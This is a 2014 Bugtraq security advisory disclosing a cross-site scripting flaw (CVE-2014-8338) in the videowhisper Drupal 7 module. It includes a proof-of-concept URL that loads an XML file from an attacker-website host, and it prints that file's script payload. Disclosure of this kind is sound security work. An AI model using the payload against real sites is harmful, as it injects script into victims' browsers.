[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201411060711.sA67Bf2r023130@sf01web2.securityfocus.com>
Date: Thu, 6 Nov 2014 07:11:41 GMT
From: mdgh9@...oo.com
To: bugtraq@...urityfocus.com
Subject: [CVE-2014-8338] Cross Site Scripting (XSS) vulnerability in
videowhisper
Hello,
Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7.
Vendor Notification: 22, Oct 2014
Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php
POC: http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt
The content of xss.txt:
<root>
<script xmlns="http://www.w3.org/2000/svg"><![CDATA[
alert('XSS');
]]></script>
</root>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.
Best regards
Powered by blists - more mailing lists